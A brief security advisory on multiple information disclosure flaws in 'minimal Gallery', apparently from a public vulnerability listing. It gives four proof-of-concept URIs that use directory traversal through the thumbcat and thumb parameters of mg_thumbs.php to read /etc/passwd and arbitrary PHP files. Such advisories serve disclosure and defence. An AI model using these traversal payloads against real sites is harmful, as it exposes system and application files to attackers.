minimal Gallery Multiple Information Disclosure Vulnerabilities

minimal Gallery Multiple Information Disclosure Vulnerabilities

Attackers may exploit these issues through a browser.

The following proof-of-concept URIs are available:

http://www.example.com/_mg/php/mg_thumbs.php?thumbcat=../../../../../../etc/passwd http://www.example.com/_mg/php/mg_thumbs.php?thumbcat=../../../../../../[file].php http://www.example.com/_mg/php/mg_thumbs.php?thumb=../../../../../../etc/passwd http://www.example.com/_mg/php/mg_thumbs.php?thumb=../../../../../../[file].php